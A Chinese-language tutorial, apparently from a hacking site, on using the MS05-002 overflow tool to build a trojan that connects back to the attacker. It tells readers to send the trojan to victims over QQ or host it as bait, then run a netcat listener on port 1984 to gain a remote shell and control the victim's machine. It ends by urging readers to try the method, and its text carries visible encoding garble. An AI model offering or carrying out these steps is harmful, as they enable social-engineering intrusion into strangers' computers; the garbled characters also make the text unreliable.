黑客如何利用Ms05002溢出找“肉雞” (圖)
實(shí)施方法:通過(guò)Ms05002攻擊工具,溢出反彈IP、反彈端口,會(huì)生成含有木馬性質(zhì)的文件。然后將這個(gè)產(chǎn)生的文件,以QQ傳輸?shù)男问桨l(fā)給受害者觀看,或者將其上傳到自己的主頁(yè)空間,引誘其他人訪問(wèn)。最后執(zhí)行NC瑞士軍刀,監(jiān)聽(tīng)本機(jī)端口,收取已經(jīng)運(yùn)行產(chǎn)生文件的主機(jī)。
步驟1.首先從網(wǎng)上下載Ms05002溢出工具,釋放到比較理想的硬盤(pán)驅(qū)動(dòng)器中,然后在CMD命令行下,輸入軟件名稱啟動(dòng)該程序,會(huì)出現(xiàn)一些英文形式的幫助信息(如圖1)。

圖1
小提示:Ms05002溢出工具,是一款需要在命令行下支持運(yùn)行的程序,它可以通過(guò)溢出反彈的IP地址,生成木馬服務(wù)端。這點(diǎn)與其他溢出程序是完全不同,而且效率相比之下,也有明顯的提高,真不愧是即所有溢出程序的升級(jí)版本。 步驟2.繼續(xù)在其下的命令行處,輸入命令Ms05002 要生成的木馬文件名 本地機(jī)器IP地址 溢出端口(如圖2),然后敲擊“回車鍵”執(zhí)行。屏幕會(huì)不停的向上滾動(dòng),這時(shí)還會(huì)出現(xiàn)帶有兩句“OK”的字母提示,說(shuō)明木馬文件已經(jīng)生成完畢了。

圖 2
步驟3.通常溢出過(guò)后,都需要監(jiān)聽(tīng)工具來(lái)抓捕肉雞。這里也不例外,跳轉(zhuǎn)到事先準(zhǔn)備的NC工具所在目錄,然后在其命令行處輸入NC –VV –L –P 1984的監(jiān)聽(tīng)命令,并敲擊“回車”鍵,開(kāi)始監(jiān)聽(tīng)本地1984端口的信息出入。
小提示:NC監(jiān)聽(tīng)軟件-VV參數(shù)代表,得到更詳細(xì)的輸入監(jiān)聽(tīng)內(nèi)容。-L代表連接端口關(guān)閉后,仍然繼續(xù)監(jiān)聽(tīng)。-P進(jìn)行監(jiān)聽(tīng)本地端口,后跟數(shù)字就是所要監(jiān)聽(tīng)的端口號(hào)。
步驟4.將溢出生成的木馬,以QQ形式發(fā)給網(wǎng)友運(yùn)行,或者上傳到自己的個(gè)人空間中,騙取受害者瀏覽運(yùn)行。如果用戶不幸查看所發(fā)去的木馬,正在本機(jī)監(jiān)聽(tīng)的NC等待狀況,就會(huì)改為可操作命令行(如圖3)。而此時(shí)的命令操作平臺(tái),也正是遠(yuǎn)方主機(jī)的SHELL平臺(tái)(有關(guān)SHELL的解釋,已經(jīng)在前幾篇文章中敘述過(guò),這里就不做過(guò)多講解了),現(xiàn)在你就可以在其主機(jī)上,為所欲為的以命令形式操控機(jī)器。

圖 3
結(jié)束語(yǔ):最快捷和最靈驗(yàn)的“抓雞”方法,已經(jīng)擺在您面前了。還在猶豫什么?趕快前去一試此妙法吧!
注:本文最主要的目的是介紹黑客如何攻擊你電腦的,任何人不得利用本文介紹的技術(shù)作非法的事情。
相關(guān)文章
Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷
Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷...2007-02-02

